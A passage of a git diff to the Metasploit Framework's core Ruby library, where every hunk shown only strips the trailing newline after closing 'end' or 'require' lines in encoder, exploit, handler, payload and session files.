'msf/core/encoder/alphanum' require 'msf/core/encoder/nonalpha' -require 'msf/core/encoder/nonupper' +require 'msf/core/encoder/nonupper' \ No newline at end of file diff --git a/lib/msf/core/encoder/alphanum.rb b/lib/msf/core/encoder/alphanum.rb index 6bee07eb2f..6cdd92b455 100644 --- a/lib/msf/core/encoder/alphanum.rb +++ b/lib/msf/core/encoder/alphanum.rb @@ -23,4 +23,4 @@ class Encoder::Alphanum < Msf::Encoder end -end +end \ No newline at end of file diff --git a/lib/msf/core/encoder/nonalpha.rb b/lib/msf/core/encoder/nonalpha.rb index d87834683d..1ebfdc7f74 100644 --- a/lib/msf/core/encoder/nonalpha.rb +++ b/lib/msf/core/encoder/nonalpha.rb @@ -15,4 +15,4 @@ class Encoder::NonAlpha < Msf::Encoder end -end +end \ No newline at end of file diff --git a/lib/msf/core/encoder/nonupper.rb b/lib/msf/core/encoder/nonupper.rb index 78b156d24c..f83b01151e 100644 --- a/lib/msf/core/encoder/nonupper.rb +++ b/lib/msf/core/encoder/nonupper.rb @@ -15,4 +15,4 @@ class Encoder::NonUpper < Msf::Encoder end -end +end \ No newline at end of file diff --git a/lib/msf/core/encoder/xor.rb b/lib/msf/core/encoder/xor.rb index d713d770ba..7c136569e7 100644 --- a/lib/msf/core/encoder/xor.rb +++ b/lib/msf/core/encoder/xor.rb @@ -40,4 +40,4 @@ class Msf::Encoder::Xor < Msf::Encoder return bad_keys end -end +end \ No newline at end of file diff --git a/lib/msf/core/encoder/xor_additive_feedback.rb b/lib/msf/core/encoder/xor_additive_feedback.rb index f4cae9dd63..80bae61bf2 100644 --- a/lib/msf/core/encoder/xor_additive_feedback.rb +++ b/lib/msf/core/encoder/xor_additive_feedback.rb @@ -85,4 +85,4 @@ class Msf::Encoder::XorAdditiveFeedback < Msf::Encoder::Xor return state.orig_key end -end +end \ No newline at end of file diff --git a/lib/msf/core/encoding/xor.rb b/lib/msf/core/encoding/xor.rb index 2a4fafb464..4e1ebf5f30 100644 --- a/lib/msf/core/encoding/xor.rb +++ b/lib/msf/core/encoding/xor.rb @@ -27,4 +27,4 @@ class Xor end -end end +end end \ No newline at end of file diff --git a/lib/msf/core/event_dispatcher.rb b/lib/msf/core/event_dispatcher.rb index 74c8568d77..0b4f994f07 100644 --- a/lib/msf/core/event_dispatcher.rb +++ b/lib/msf/core/event_dispatcher.rb @@ -221,4 +221,4 @@ protected end -end +end \ No newline at end of file diff --git a/lib/msf/core/exceptions.rb b/lib/msf/core/exceptions.rb index 16bbfe4157..9acb8b121e 100644 --- a/lib/msf/core/exceptions.rb +++ b/lib/msf/core/exceptions.rb @@ -284,4 +284,4 @@ class PluginLoadError < RuntimeError end end -end +end \ No newline at end of file diff --git a/lib/msf/core/exceptions.rb.ut.rb b/lib/msf/core/exceptions.rb.ut.rb index a2921b46b0..7e481717b3 100644 --- a/lib/msf/core/exceptions.rb.ut.rb +++ b/lib/msf/core/exceptions.rb.ut.rb @@ -37,4 +37,4 @@ class UnitTest < Test::Unit::TestCase end end -end +end \ No newline at end of file diff --git a/lib/msf/core/exploit.rb b/lib/msf/core/exploit.rb index 5631f9a597..e74b680d35 100644 --- a/lib/msf/core/exploit.rb +++ b/lib/msf/core/exploit.rb @@ -1238,4 +1238,4 @@ protected end -end +end \ No newline at end of file diff --git a/lib/msf/core/exploit.rb.ut.rb b/lib/msf/core/exploit.rb.ut.rb index 23fec69b54..6992020843 100644 --- a/lib/msf/core/exploit.rb.ut.rb +++ b/lib/msf/core/exploit.rb.ut.rb @@ -34,4 +34,4 @@ class Exploit::UnitTest < Test::Unit::TestCase end -end +end \ No newline at end of file diff --git a/lib/msf/core/exploit/arkeia.rb b/lib/msf/core/exploit/arkeia.rb index bcc97dad5a..be3ca04d9a 100644 --- a/lib/msf/core/exploit/arkeia.rb +++ b/lib/msf/core/exploit/arkeia.rb @@ -218,4 +218,4 @@ module Exploit::Remote::Arkeia attr_accessor :recv_buff end -end +end \ No newline at end of file diff --git a/lib/msf/core/exploit/brute.rb b/lib/msf/core/exploit/brute.rb index dfe384e06a..f5afe70f60 100644 --- a/lib/msf/core/exploit/brute.rb +++ b/lib/msf/core/exploit/brute.rb @@ -180,4 +180,4 @@ protected end -end +end \ No newline at end of file diff --git a/lib/msf/core/exploit/brutetargets.rb b/lib/msf/core/exploit/brutetargets.rb index 08a63930b1..33de446044 100644 --- a/lib/msf/core/exploit/brutetargets.rb +++ b/lib/msf/core/exploit/brutetargets.rb @@ -36,4 +36,4 @@ end end -end +end \ No newline at end of file diff --git a/lib/msf/core/exploit/capture.rb b/lib/msf/core/exploit/capture.rb index 160606a99e..ee81e25a1f 100644 --- a/lib/msf/core/exploit/capture.rb +++ b/lib/msf/core/exploit/capture.rb @@ -116,4 +116,4 @@ module Exploit::Capture end -end +end \ No newline at end of file diff --git a/lib/msf/core/exploit/dcerpc.rb b/lib/msf/core/exploit/dcerpc.rb index aa25f41b9d..52db320fc3 100644 --- a/lib/msf/core/exploit/dcerpc.rb +++ b/lib/msf/core/exploit/dcerpc.rb @@ -152,4 +152,4 @@ module Exploit::Remote::DCERPC end -end +end \ No newline at end of file diff --git a/lib/msf/core/exploit/dcerpc.rb.ut.rb b/lib/msf/core/exploit/dcerpc.rb.ut.rb index 1df15ea6d5..362789365f 100644 --- a/lib/msf/core/exploit/dcerpc.rb.ut.rb +++ b/lib/msf/core/exploit/dcerpc.rb.ut.rb @@ -23,4 +23,4 @@ class Exploit::Remote::DCERPC::UnitTest < Test::Unit::TestCase end -end +end \ No newline at end of file diff --git a/lib/msf/core/exploit/dcerpc_epm.rb b/lib/msf/core/exploit/dcerpc_epm.rb index 6dbbd18c86..5cc9963c94 100644 --- a/lib/msf/core/exploit/dcerpc_epm.rb +++ b/lib/msf/core/exploit/dcerpc_epm.rb @@ -217,4 +217,4 @@ module Exploit::Remote::DCERPC_EPM end end -end +end \ No newline at end of file diff --git a/lib/msf/core/exploit/dcerpc_lsa.rb b/lib/msf/core/exploit/dcerpc_lsa.rb index 7031ee4e2b..ffe6e31a02 100644 --- a/lib/msf/core/exploit/dcerpc_lsa.rb +++ b/lib/msf/core/exploit/dcerpc_lsa.rb @@ -34,4 +34,4 @@ module Exploit::Remote::DCERPC_LSA end end -end +end \ No newline at end of file diff --git a/lib/msf/core/exploit/dcerpc_mgmt.rb b/lib/msf/core/exploit/dcerpc_mgmt.rb index c97360daa8..ef46f04a79 100644 --- a/lib/msf/core/exploit/dcerpc_mgmt.rb +++ b/lib/msf/core/exploit/dcerpc_mgmt.rb @@ -200,4 +200,4 @@ module Exploit::Remote::DCERPC_MGMT end -end +end \ No newline at end of file diff --git a/lib/msf/core/exploit/egghunter.rb b/lib/msf/core/exploit/egghunter.rb index e9ba9b5134..7e3bfcf73f 100644 --- a/lib/msf/core/exploit/egghunter.rb +++ b/lib/msf/core/exploit/egghunter.rb @@ -51,4 +51,4 @@ module Exploit::Egghunter end -end +end \ No newline at end of file diff --git a/lib/msf/core/exploit/ftp.rb b/lib/msf/core/exploit/ftp.rb index f09acba210..f14d87db71 100644 --- a/lib/msf/core/exploit/ftp.rb +++ b/lib/msf/core/exploit/ftp.rb @@ -153,4 +153,4 @@ protected end -end +end \ No newline at end of file diff --git a/lib/msf/core/exploit/http.rb b/lib/msf/core/exploit/http.rb index 09533d632d..90a7892229 100644 --- a/lib/msf/core/exploit/http.rb +++ b/lib/msf/core/exploit/http.rb @@ -863,4 +863,4 @@ module Exploit::Remote::HttpServer::PHPInclude end -end +end \ No newline at end of file diff --git a/lib/msf/core/exploit/imap.rb b/lib/msf/core/exploit/imap.rb index ba1d4b207c..fe02a4da91 100644 --- a/lib/msf/core/exploit/imap.rb +++ b/lib/msf/core/exploit/imap.rb @@ -111,4 +111,4 @@ protected end -end +end \ No newline at end of file diff --git a/lib/msf/core/exploit/ip.rb b/lib/msf/core/exploit/ip.rb index 60a654cf37..42371d6151 100644 --- a/lib/msf/core/exploit/ip.rb +++ b/lib/msf/core/exploit/ip.rb @@ -114,4 +114,4 @@ protected attr_accessor :ip_sock end -end +end \ No newline at end of file diff --git a/lib/msf/core/exploit/kernel_mode.rb b/lib/msf/core/exploit/kernel_mode.rb index b6b65bb5a4..1c36557df0 100644 --- a/lib/msf/core/exploit/kernel_mode.rb +++ b/lib/msf/core/exploit/kernel_mode.rb @@ -63,4 +63,4 @@ protected end -end +end \ No newline at end of file diff --git a/lib/msf/core/exploit/lorcon.rb b/lib/msf/core/exploit/lorcon.rb index 8fd7c3c4eb..51c396e533 100644 --- a/lib/msf/core/exploit/lorcon.rb +++ b/lib/msf/core/exploit/lorcon.rb @@ -124,4 +124,4 @@ module Exploit::Lorcon end -end +end \ No newline at end of file diff --git a/lib/msf/core/exploit/mssql.rb b/lib/msf/core/exploit/mssql.rb index a97766fbaa..5af4ecd1bb 100644 --- a/lib/msf/core/exploit/mssql.rb +++ b/lib/msf/core/exploit/mssql.rb @@ -165,4 +165,4 @@ module Exploit::Remote::MSSQL end end -end +end \ No newline at end of file diff --git a/lib/msf/core/exploit/ndmp.rb b/lib/msf/core/exploit/ndmp.rb index d3d138aa57..a4c84c1db1 100644 --- a/lib/msf/core/exploit/ndmp.rb +++ b/lib/msf/core/exploit/ndmp.rb @@ -115,4 +115,4 @@ module Exploit::Remote::NDMP attr_accessor :recv_buff end -end +end \ No newline at end of file diff --git a/lib/msf/core/exploit/pop2.rb b/lib/msf/core/exploit/pop2.rb index 99463be6f7..6cb610fb29 100644 --- a/lib/msf/core/exploit/pop2.rb +++ b/lib/msf/core/exploit/pop2.rb @@ -131,4 +131,4 @@ protected end -end +end \ No newline at end of file diff --git a/lib/msf/core/exploit/seh.rb b/lib/msf/core/exploit/seh.rb index 0ae0d4e2d3..b690a2c359 100644 --- a/lib/msf/core/exploit/seh.rb +++ b/lib/msf/core/exploit/seh.rb @@ -68,4 +68,4 @@ module Exploit::Seh end -end +end \ No newline at end of file diff --git a/lib/msf/core/exploit/seh.rb.ut.rb b/lib/msf/core/exploit/seh.rb.ut.rb index d01d1313e0..ed99941fd5 100644 --- a/lib/msf/core/exploit/seh.rb.ut.rb +++ b/lib/msf/core/exploit/seh.rb.ut.rb @@ -25,4 +25,4 @@ class Exploit::Seh::UnitTest < Test::Unit::TestCase end -end +end \ No newline at end of file diff --git a/lib/msf/core/exploit/smb.rb b/lib/msf/core/exploit/smb.rb index 24f3469f20..5a834dca28 100644 --- a/lib/msf/core/exploit/smb.rb +++ b/lib/msf/core/exploit/smb.rb @@ -255,4 +255,4 @@ module Exploit::Remote::SMBServer end -end +end \ No newline at end of file diff --git a/lib/msf/core/exploit/smtp.rb b/lib/msf/core/exploit/smtp.rb index e7aa682a50..86eda98dd3 100644 --- a/lib/msf/core/exploit/smtp.rb +++ b/lib/msf/core/exploit/smtp.rb @@ -81,4 +81,4 @@ protected end -end +end \ No newline at end of file diff --git a/lib/msf/core/exploit/smtp_deliver.rb b/lib/msf/core/exploit/smtp_deliver.rb index 430a0131be..22242d53f3 100644 --- a/lib/msf/core/exploit/smtp_deliver.rb +++ b/lib/msf/core/exploit/smtp_deliver.rb @@ -70,4 +70,4 @@ module Exploit::Remote::SMTPDeliver end -end +end \ No newline at end of file diff --git a/lib/msf/core/exploit/sunrpc.rb b/lib/msf/core/exploit/sunrpc.rb index 4155df3861..2ff001d191 100644 --- a/lib/msf/core/exploit/sunrpc.rb +++ b/lib/msf/core/exploit/sunrpc.rb @@ -73,4 +73,4 @@ module Exploit::Remote::SunRPC attr_accessor :rpcobj end -end +end \ No newline at end of file diff --git a/lib/msf/core/exploit/tcp.rb b/lib/msf/core/exploit/tcp.rb index 5b8641de3c..f530634c8b 100644 --- a/lib/msf/core/exploit/tcp.rb +++ b/lib/msf/core/exploit/tcp.rb @@ -439,4 +439,4 @@ protected end -end +end \ No newline at end of file diff --git a/lib/msf/core/exploit/tcp.rb.ut.rb b/lib/msf/core/exploit/tcp.rb.ut.rb index 2e78671765..3ecd1c703d 100644 --- a/lib/msf/core/exploit/tcp.rb.ut.rb +++ b/lib/msf/core/exploit/tcp.rb.ut.rb @@ -22,4 +22,4 @@ class Exploit::Remote::Tcp::UnitTest < Test::Unit::TestCase end -end +end \ No newline at end of file diff --git a/lib/msf/core/exploit/udp.rb b/lib/msf/core/exploit/udp.rb index b0af3c1d11..1ac5d7a6b1 100644 --- a/lib/msf/core/exploit/udp.rb +++ b/lib/msf/core/exploit/udp.rb @@ -154,4 +154,4 @@ protected attr_accessor :udp_sock end -end +end \ No newline at end of file diff --git a/lib/msf/core/exploit_driver.rb b/lib/msf/core/exploit_driver.rb index 412c8487c7..f521898d63 100644 --- a/lib/msf/core/exploit_driver.rb +++ b/lib/msf/core/exploit_driver.rb @@ -217,4 +217,4 @@ protected end -end +end \ No newline at end of file diff --git a/lib/msf/core/framework.rb b/lib/msf/core/framework.rb index c8d750008c..57a4b42d7c 100644 --- a/lib/msf/core/framework.rb +++ b/lib/msf/core/framework.rb @@ -145,4 +145,4 @@ protected attr_writer :db # :nodoc: end -end +end \ No newline at end of file diff --git a/lib/msf/core/handler.rb b/lib/msf/core/handler.rb index 5002a59e96..fd323e27f6 100644 --- a/lib/msf/core/handler.rb +++ b/lib/msf/core/handler.rb @@ -242,4 +242,4 @@ end end # The default none handler -require 'msf/core/handler/none' +require 'msf/core/handler/none' \ No newline at end of file diff --git a/lib/msf/core/handler/bind_tcp.rb b/lib/msf/core/handler/bind_tcp.rb index 163e85df34..701deecca3 100644 --- a/lib/msf/core/handler/bind_tcp.rb +++ b/lib/msf/core/handler/bind_tcp.rb @@ -176,4 +176,4 @@ protected end end -end +end \ No newline at end of file diff --git a/lib/msf/core/handler/bind_tcp.rb.ut.rb b/lib/msf/core/handler/bind_tcp.rb.ut.rb index 37090077d3..54352e2687 100644 --- a/lib/msf/core/handler/bind_tcp.rb.ut.rb +++ b/lib/msf/core/handler/bind_tcp.rb.ut.rb @@ -48,4 +48,4 @@ class Handler::BindTcp::UnitTest < Test::Unit::TestCase end -end +end \ No newline at end of file diff --git a/lib/msf/core/handler/find_port.rb b/lib/msf/core/handler/find_port.rb index 15bac6aa43..973529054a 100644 --- a/lib/msf/core/handler/find_port.rb +++ b/lib/msf/core/handler/find_port.rb @@ -146,4 +146,4 @@ protected end end -end +end \ No newline at end of file diff --git a/lib/msf/core/handler/find_shell.rb b/lib/msf/core/handler/find_shell.rb index 55ba611f81..7797aa37b9 100644 --- a/lib/msf/core/handler/find_shell.rb +++ b/lib/msf/core/handler/find_shell.rb @@ -43,4 +43,4 @@ protected end end -end +end \ No newline at end of file diff --git a/lib/msf/core/handler/find_tag.rb b/lib/msf/core/handler/find_tag.rb index 4990033184..0df5847004 100644 --- a/lib/msf/core/handler/find_tag.rb +++ b/lib/msf/core/handler/find_tag.rb @@ -88,4 +88,4 @@ protected end end -end +end \ No newline at end of file diff --git a/lib/msf/core/handler/none.rb b/lib/msf/core/handler/none.rb index bc6951aff5..cce7babfbe 100644 --- a/lib/msf/core/handler/none.rb +++ b/lib/msf/core/handler/none.rb @@ -27,4 +27,4 @@ module None end end -end +end \ No newline at end of file diff --git a/lib/msf/core/handler/passivex.rb b/lib/msf/core/handler/passivex.rb index 13749f610c..61245eda7d 100644 --- a/lib/msf/core/handler/passivex.rb +++ b/lib/msf/core/handler/passivex.rb @@ -400,4 +400,4 @@ protected end end -end +end \ No newline at end of file diff --git a/lib/msf/core/handler/reverse_tcp.rb b/lib/msf/core/handler/reverse_tcp.rb index 5b08379418..3de03a9c3e 100644 --- a/lib/msf/core/handler/reverse_tcp.rb +++ b/lib/msf/core/handler/reverse_tcp.rb @@ -146,4 +146,4 @@ protected end end -end +end \ No newline at end of file diff --git a/lib/msf/core/handler/reverse_tcp.rb.ut.rb b/lib/msf/core/handler/reverse_tcp.rb.ut.rb index fd39848a5a..3d37038b51 100644 --- a/lib/msf/core/handler/reverse_tcp.rb.ut.rb +++ b/lib/msf/core/handler/reverse_tcp.rb.ut.rb @@ -59,4 +59,4 @@ class Handler::ReverseTcp::UnitTest < Test::Unit::TestCase end -end +end \ No newline at end of file diff --git a/lib/msf/core/handler/reverse_tcp_double.rb b/lib/msf/core/handler/reverse_tcp_double.rb index d0edbd428a..df23851f33 100644 --- a/lib/msf/core/handler/reverse_tcp_double.rb +++ b/lib/msf/core/handler/reverse_tcp_double.rb @@ -270,4 +270,4 @@ protected end end -end +end \ No newline at end of file diff --git a/lib/msf/core/module.rb b/lib/msf/core/module.rb index 121fc64cf0..24a4a9cb91 100644 --- a/lib/msf/core/module.rb +++ b/lib/msf/core/module.rb @@ -754,4 +754,4 @@ SiteReference = Msf::Module::SiteReference Platform = Msf::Module::Platform Target = Msf::Module::Target -end +end \ No newline at end of file diff --git a/lib/msf/core/module/author.rb b/lib/msf/core/module/author.rb index 30c85c971d..910866334c 100644 --- a/lib/msf/core/module/author.rb +++ b/lib/msf/core/module/author.rb @@ -123,4 +123,4 @@ class Msf::Module::Author attr_accessor :email attr_reader :name -end +end \ No newline at end of file diff --git a/lib/msf/core/module/author.rb.ut.rb b/lib/msf/core/module/author.rb.ut.rb index 207d4c96ad..ad5c174aac 100644 --- a/lib/msf/core/module/author.rb.ut.rb +++ b/lib/msf/core/module/author.rb.ut.rb @@ -20,4 +20,4 @@ class Module::Author::UnitTest < Test::Unit::TestCase end end -end +end \ No newline at end of file diff --git a/lib/msf/core/module/auxiliary_action.rb b/lib/msf/core/module/auxiliary_action.rb index 2832aa0b50..857c3c23b9 100644 --- a/lib/msf/core/module/auxiliary_action.rb +++ b/lib/msf/core/module/auxiliary_action.rb @@ -51,5 +51,4 @@ protected attr_writer :name, :opts # :nodoc: -end - +end \ No newline at end of file diff --git a/lib/msf/core/module/platform.rb b/lib/msf/core/module/platform.rb index f41747c40e..247ba5d75e 100644 --- a/lib/msf/core/module/platform.rb +++ b/lib/msf/core/module/platform.rb @@ -431,4 +431,4 @@ class Msf::Module::Platform Rank = 100 Alias = "php" end -end +end \ No newline at end of file diff --git a/lib/msf/core/module/platform_list.rb b/lib/msf/core/module/platform_list.rb index 1ebb5d85e4..f558b8daab 100644 --- a/lib/msf/core/module/platform_list.rb +++ b/lib/msf/core/module/platform_list.rb @@ -182,4 +182,4 @@ class Msf::Module::PlatformList raise RuntimeError, "No more expansion possible", caller end -end +end \ No newline at end of file diff --git a/lib/msf/core/module/platform_list.rb.ut.rb b/lib/msf/core/module/platform_list.rb.ut.rb index 0f519f7918..fcafbf75c5 100644 --- a/lib/msf/core/module/platform_list.rb.ut.rb +++ b/lib/msf/core/module/platform_list.rb.ut.rb @@ -50,4 +50,4 @@ class Msf::Module::PlatformList::UnitTest < Test::Unit::TestCase l1 = Msf::Module::PlatformList.new('win xp sp1') assert_equal( [ ], (l1 & l2).platforms ) end -end +end \ No newline at end of file diff --git a/lib/msf/core/module/reference.rb b/lib/msf/core/module/reference.rb index 0939f19a14..d179815111 100644 --- a/lib/msf/core/module/reference.rb +++ b/lib/msf/core/module/reference.rb @@ -152,6 +152,4 @@ protected attr_writer :site, :ctx_id, :ctx_val -end - - +end \ No newline at end of file diff --git a/lib/msf/core/module/reference.rb.ut.rb b/lib/msf/core/module/reference.rb.ut.rb index bd59184dc1..8525fcfe41 100644 --- a/lib/msf/core/module/reference.rb.ut.rb +++ b/lib/msf/core/module/reference.rb.ut.rb @@ -23,4 +23,4 @@ class Module::Reference::UnitTest < Test::Unit::TestCase end end -end +end \ No newline at end of file diff --git a/lib/msf/core/module/target.rb b/lib/msf/core/module/target.rb index c7ed014a07..70f2149af7 100644 --- a/lib/msf/core/module/target.rb +++ b/lib/msf/core/module/target.rb @@ -287,5 +287,4 @@ protected attr_writer :name, :platform, :arch, :opts, :ret, :save_registers # :nodoc: attr_writer :bruteforce # :nodoc: -end - +end \ No newline at end of file diff --git a/lib/msf/core/module/target.rb.ut.rb b/lib/msf/core/module/target.rb.ut.rb index 7c7c87460f..59169fcb9e 100644 --- a/lib/msf/core/module/target.rb.ut.rb +++ b/lib/msf/core/module/target.rb.ut.rb @@ -22,4 +22,4 @@ class Module::Target::UnitTest < Test::Unit::TestCase end end -end +end \ No newline at end of file diff --git a/lib/msf/core/module_manager.rb b/lib/msf/core/module_manager.rb index 0516371c68..2c7b64f953 100644 --- a/lib/msf/core/module_manager.rb +++ b/lib/msf/core/module_manager.rb @@ -1047,4 +1047,4 @@ protected end -end +end \ No newline at end of file diff --git a/lib/msf/core/nop.rb b/lib/msf/core/nop.rb index 361f03bff7..bb0d51d7f8 100644 --- a/lib/msf/core/nop.rb +++ b/lib/msf/core/nop.rb @@ -60,4 +60,4 @@ class Nop < Msf::Module end -end +end \ No newline at end of file diff --git a/lib/msf/core/option_container.rb b/lib/msf/core/option_container.rb index b644f05a16..06c848b0a9 100644 --- a/lib/msf/core/option_container.rb +++ b/lib/msf/core/option_container.rb @@ -729,4 +729,4 @@ end end -end +end \ No newline at end of file diff --git a/lib/msf/core/option_container.rb.ut.rb b/lib/msf/core/option_container.rb.ut.rb index b9ae1be71f..323315bb6f 100644 --- a/lib/msf/core/option_container.rb.ut.rb +++ b/lib/msf/core/option_container.rb.ut.rb @@ -136,4 +136,4 @@ class OptionContainer::UnitTest < Test::Unit::TestCase end end -end +end \ No newline at end of file diff --git a/lib/msf/core/payload.rb b/lib/msf/core/payload.rb index 5f2f61b90f..aa9f44d017 100644 --- a/lib/msf/core/payload.rb +++ b/lib/msf/core/payload.rb @@ -563,4 +563,4 @@ protected end -end +end \ No newline at end of file diff --git a/lib/msf/core/payload/bsd.rb b/lib/msf/core/payload/bsd.rb index 4686eb8f00..6fdc5072fc 100644 --- a/lib/msf/core/payload/bsd.rb +++ b/lib/msf/core/payload/bsd.rb @@ -114,4 +114,4 @@ module Msf::Payload::Bsd end -end +end \ No newline at end of file diff --git a/lib/msf/core/payload/generic.rb b/lib/msf/core/payload/generic.rb index be2ca5a001..b0e0610ac6 100644 --- a/lib/msf/core/payload/generic.rb +++ b/lib/msf/core/payload/generic.rb @@ -249,4 +249,4 @@ protected end -end +end \ No newline at end of file diff --git a/lib/msf/core/payload/linux.rb b/lib/msf/core/payload/linux.rb index 3c4830973e..ee9cd004ef 100644 --- a/lib/msf/core/payload/linux.rb +++ b/lib/msf/core/payload/linux.rb @@ -110,4 +110,4 @@ module Msf::Payload::Linux end -end +end \ No newline at end of file diff --git a/lib/msf/core/payload/netware.rb b/lib/msf/core/payload/netware.rb index 9b440c6927..9ce41f475b 100644 --- a/lib/msf/core/payload/netware.rb +++ b/lib/msf/core/payload/netware.rb @@ -30,4 +30,4 @@ module Msf::Payload::Netware return encoders2; end -end +end \ No newline at end of file diff --git a/lib/msf/core/payload/osx.rb b/lib/msf/core/payload/osx.rb index 915ab64fa0..192b0bff1c 100644 --- a/lib/msf/core/payload/osx.rb +++ b/lib/msf/core/payload/osx.rb @@ -114,4 +114,4 @@ module Msf::Payload::Osx end -end +end \ No newline at end of file diff --git a/lib/msf/core/payload/php.rb b/lib/msf/core/payload/php.rb index fa5847e7c7..ce8257ad82 100644 --- a/lib/msf/core/payload/php.rb +++ b/lib/msf/core/payload/php.rb @@ -143,4 +143,4 @@ module Msf::Payload::Php return buf end -end +end \ No newline at end of file diff --git a/lib/msf/core/payload/single.rb b/lib/msf/core/payload/single.rb index 8a1b18952a..bdef8e5094 100644 --- a/lib/msf/core/payload/single.rb +++ b/lib/msf/core/payload/single.rb @@ -41,4 +41,4 @@ module Msf::Payload::Single end end -end +end \ No newline at end of file diff --git a/lib/msf/core/payload/solaris.rb b/lib/msf/core/payload/solaris.rb index 8fa1d69da9..44cabe3a02 100644 --- a/lib/msf/core/payload/solaris.rb +++ b/lib/msf/core/payload/solaris.rb @@ -111,4 +111,4 @@ module Msf::Payload::Solaris end -end +end \ No newline at end of file diff --git a/lib/msf/core/payload/stager.rb b/lib/msf/core/payload/stager.rb index 0d194c3e6d..ed17e4d2e6 100644 --- a/lib/msf/core/payload/stager.rb +++ b/lib/msf/core/payload/stager.rb @@ -164,4 +164,4 @@ module Msf::Payload::Stager # attr_accessor :stage_prefix -end +end \ No newline at end of file diff --git a/lib/msf/core/payload/windows.rb b/lib/msf/core/payload/windows.rb index 7d59973e0c..076cef36ef 100644 --- a/lib/msf/core/payload/windows.rb +++ b/lib/msf/core/payload/windows.rb @@ -105,4 +105,4 @@ module Msf::Payload::Windows return true end -end +end \ No newline at end of file diff --git a/lib/msf/core/payload/windows/dllinject.rb b/lib/msf/core/payload/windows/dllinject.rb index bcfc2ca806..975295e78d 100644 --- a/lib/msf/core/payload/windows/dllinject.rb +++ b/lib/msf/core/payload/windows/dllinject.rb @@ -233,4 +233,4 @@ module Payload::Windows::DllInject end -end +end \ No newline at end of file diff --git a/lib/msf/core/payload/windows/exec.rb b/lib/msf/core/payload/windows/exec.rb index d6a0d2d8c2..2911214dff 100644 --- a/lib/msf/core/payload/windows/exec.rb +++ b/lib/msf/core/payload/windows/exec.rb @@ -59,4 +59,4 @@ module Payload::Windows::Exec end -end +end \ No newline at end of file diff --git a/lib/msf/core/payload_set.rb b/lib/msf/core/payload_set.rb index 1b0df24592..288449752a 100644 --- a/lib/msf/core/payload_set.rb +++ b/lib/msf/core/payload_set.rb @@ -402,4 +402,4 @@ protected end -end +end \ No newline at end of file diff --git a/lib/msf/core/plugin.rb b/lib/msf/core/plugin.rb index 08a2297a50..a7dba2524c 100644 --- a/lib/msf/core/plugin.rb +++ b/lib/msf/core/plugin.rb @@ -176,4 +176,4 @@ protected end -end +end \ No newline at end of file diff --git a/lib/msf/core/plugin_manager.rb b/lib/msf/core/plugin_manager.rb index 1e3362b4b1..48712ab5ec 100644 --- a/lib/msf/core/plugin_manager.rb +++ b/lib/msf/core/plugin_manager.rb @@ -94,4 +94,4 @@ class PluginManager < Array end -end +end \ No newline at end of file diff --git a/lib/msf/core/session.rb b/lib/msf/core/session.rb index c09597aa1e..f76f016c00 100644 --- a/lib/msf/core/session.rb +++ b/lib/msf/core/session.rb @@ -212,4 +212,4 @@ protected end -end +end \ No newline at end of file diff --git a/lib/msf/core/session/basic.rb b/lib/msf/core/session/basic.rb index d2255ca98b..f0f43a42fc 100644 --- a/lib/msf/core/session/basic.rb +++ b/lib/msf/core/session/basic.rb @@ -39,4 +39,4 @@ protected end end -end +end \ No newline at end of file diff --git a/lib/msf/core/session/comm.rb b/lib/msf/core/session/comm.rb index b4942d363d..1b7c96d593 100644 --- a/lib/msf/core/session/comm.rb +++ b/lib/msf/core/session/comm.rb @@ -24,4 +24,4 @@ module Comm end end -end +end \ No newline at end of file diff --git a/lib/msf/core/session/interactive.rb b/lib/msf/core/session/interactive.rb index 2bf087db77..19926574a4 100644 --- a/lib/msf/core/session/interactive.rb +++ b/lib/msf/core/session/interactive.rb @@ -132,4 +132,4 @@ protected end end -end +end \ No newline at end of file diff --git a/lib/msf/core/session/netware_console.rb b/lib/msf/core/session/netware_console.rb index 5fa1a95484..21c3a5c5af 100644 --- a/lib/msf/core/session/netware_console.rb +++ b/lib/msf/core/session/netware_console.rb @@ -100,4 +100,4 @@ class NetwareConsole end end -end +end \ No newline at end of file diff --git a/lib/msf/core/session/provider/multi_command_execution.rb b/lib/msf/core/session/provider/multi_command_execution.rb index 77823a5b89..0d283c3f69 100644 --- a/lib/msf/core/session/provider/multi_command_execution.rb +++ b/lib/msf/core/session/provider/multi_command_execution.rb @@ -52,4 +52,4 @@ end end end -end +end \ No newline at end of file diff --git a/lib/msf/core/session/provider/multi_command_shell.rb b/lib/msf/core/session/provider/multi_command_shell.rb index b73b9b771e..bddf9e6687 100644 --- a/lib/msf/core/session/provider/multi_command_shell.rb +++ b/lib/msf/core/session/provider/multi_command_shell.rb @@ -57,4 +57,4 @@ end end end -end +end \ No newline at end of file diff --git a/lib/msf/core/session/provider/single_command_execution.rb b/lib/msf/core/session/provider/single_command_execution.rb index 7da90f9f3c..48ccfcf75c 100644 --- a/lib/msf/core/session/provider/single_command_execution.rb +++ b/lib/msf/core/session/provider/single_command_execution.rb @@ -38,4 +38,4 @@ end end end -end +end \ No newline at end of file diff --git a/lib/msf/core/session/provider/single_command_shell.rb b/lib/msf/core/session/provider/single_command_shell.rb index a51949f30a..e45c8dafc7 100644 --- a/lib/msf/core/session/provider/single_command_shell.rb +++ b/lib/msf/core/session/provider/single_command_shell.rb @@ -42,4 +42,4 @@ end end end -end +end \ No newline at end of file diff --git a/lib/msf/core/session_manager.rb b/lib/msf/core/session_manager.rb index 41db73a436..e272699ffa 100644 --- a/lib/msf/core/session_manager.rb +++ b/lib/msf/core/session_manager.rb @@ -87,4 +87,4 @@ protected end -end +end \ No newline at end of file diff --git a/lib/msf/core/session_manager.rb.ut.rb b/lib/msf/core/session_manager.rb.ut.rb index b52cb320fc..3b97b62f98 100644 --- a/lib/msf/core/session_manager.rb.ut.rb +++ b/lib/msf/core/session_manager.rb.ut.rb @@ -71,4 +71,4 @@ end end -end +end \ No newline at end of file diff --git a/lib/msf/sanity.rb b/lib/msf/sanity.rb index 3686b6afea..37897dec17 100644 --- a/lib/msf/sanity.rb +++ b/lib/msf/sanity.rb @@ -30,4 +30,4 @@ if(RUBY_VERSION == "1.8.7") $stderr.puts "*** issues have been corrected. *" $stderr.puts "***********************************************************************" $stderr.puts "" -end +end \ No newline at end of file diff --git a/lib/msf/ui.rb b/lib/msf/ui.rb index 1c113f59f9..074c349d8b 100644 --- a/lib/msf/ui.rb +++ b/lib/msf/ui.rb @@ -8,4 +8,4 @@ require 'msf/ui/banner' require 'msf/ui/driver' require 'msf/ui/common' require 'msf/ui/console' -require 'msf/ui/web' +require 'msf/ui/web' \ No newline at end of file diff --git a/lib/msf/ui/banner.rb b/lib/msf/ui/banner.rb index ce592e72a0..fdf06bb23f 100644 --- 